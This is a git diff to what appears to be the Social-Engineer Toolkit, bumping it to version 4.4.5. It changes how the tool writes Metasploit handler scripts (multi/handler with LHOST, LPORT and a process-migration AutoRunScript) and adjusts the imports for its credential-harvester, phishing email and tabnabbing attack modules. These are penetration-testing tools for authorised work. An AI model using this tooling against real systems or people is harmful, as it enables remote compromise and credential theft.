diff --git a/readme/CHANGES b/readme/CHANGES index 325b93157..79fcefd71 100644 --- a/readme/CHANGES +++ b/readme/CHANGES @@ -1,3 +1,9 @@ +~~~~~~~~~~~~~~~~ +version 4.4.5 +~~~~~~~~~~~~~~~~ + +* fixed a bug that would cause the reports directory to not be active + ~~~~~~~~~~~~~~~~ version 4.4.4 ~~~~~~~~~~~~~~~~ diff --git a/set b/set index 026e1f51e..561e32aec 100755 --- a/set +++ b/set @@ -9,6 +9,9 @@ import sys import shutil import re +if not os.path.isdir("reports/"): + os.makedirs("reports") + # check to see if we have python-pycrypto try: from Crypto.Cipher import AES diff --git a/src/core/payloadgen/create_payloads.py b/src/core/payloadgen/create_payloads.py index 6e2cbc9f9..d77313810 100644 --- a/src/core/payloadgen/create_payloads.py +++ b/src/core/payloadgen/create_payloads.py @@ -715,7 +715,7 @@ try: filewrite.write("set ExitOnSession false\n") if auto_migrate == "ON": - filewrite.write("set AutoRunScript migrate -f\n") + filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") # config option for using multiscript meterpreter if meterpreter_multi == "ON": diff --git a/src/core/setcore.py b/src/core/setcore.py index 3c1a1d1f7..b24f1faa6 100644 --- a/src/core/setcore.py +++ b/src/core/setcore.py @@ -223,7 +223,7 @@ def print_error(message): print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC def get_version(): - define_version = '4.4.4' + define_version = '4.4.5' return define_version class create_menu: diff --git a/src/teensy/powershell_shellcode.py b/src/teensy/powershell_shellcode.py index ef0ab5a03..4e4db56e4 100644 --- a/src/teensy/powershell_shellcode.py +++ b/src/teensy/powershell_shellcode.py @@ -153,7 +153,7 @@ if choice == "YES": fileopen = file("src/program_junk/port.options", "r") port = fileopen.read() filewrite = file("src/program_junk/metasploit.answers", "w") - filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript migrate -f\nexploit -j" % (payload,ipaddr,port)) + filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload,ipaddr,port)) filewrite.close() print "[*] Launching Metasploit...." try: diff --git a/src/webattack/browser_exploits/gen_payload.py b/src/webattack/browser_exploits/gen_payload.py index 69b08920b..84d199eca 100644 --- a/src/webattack/browser_exploits/gen_payload.py +++ b/src/webattack/browser_exploits/gen_payload.py @@ -159,7 +159,7 @@ if meterpreter_multi == "ON": # auto migration if auto_migrate == "ON": - filewrite.write("set AutoRunScript migrate -f\n") + filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") filewrite.write("exploit -j\n\n") filewrite.close() diff --git a/src/webattack/harvester/harvester.py b/src/webattack/harvester/harvester.py index c27852468..c9e8764f9 100644 --- a/src/webattack/harvester/harvester.py +++ b/src/webattack/harvester/harvester.py @@ -488,12 +488,10 @@ def ssl_server(HandlerClass = SETHandler,ServerClass = SecureHTTPServer): if track_email == "on": webattack_email = "on" # if emailer webattack, spawn email questions if webattack_email == "on": - #try: - import src.phishing.smtp.client.smtp_web - #except Exception, e: - # print e -# reload(src.phishing.smtp.client.smtp_web) - # pause = raw_input("TEST") + try: + import src.phishing.smtp.client.smtp_web + except Exception, e: + reload(src.phishing.smtp.client.smtp_web) # see if we're tabnabbing or multiattack fileopen=file("src/program_junk/attack_vector", "r") diff --git a/src/webattack/multi_attack/multiattack.py b/src/webattack/multi_attack/multiattack.py index a74dabf22..2da60fb65 100644 --- a/src/webattack/multi_attack/multiattack.py +++ b/src/webattack/multi_attack/multiattack.py @@ -379,8 +379,6 @@ if harvester == "on" or tabnabbing == "on" or webjacking == "on": except: import tabnabbing # if the harvester is on set the multi_harvester flag sys.path.append("src/webattack/harvester") - #try: reload(harvester) - #except: import harvester if java_applet == "on" or meta_attack == "on": pexpect_flag="on" a=subprocess.Popen("python src/webattack/harvester/harvester.py", shell=True)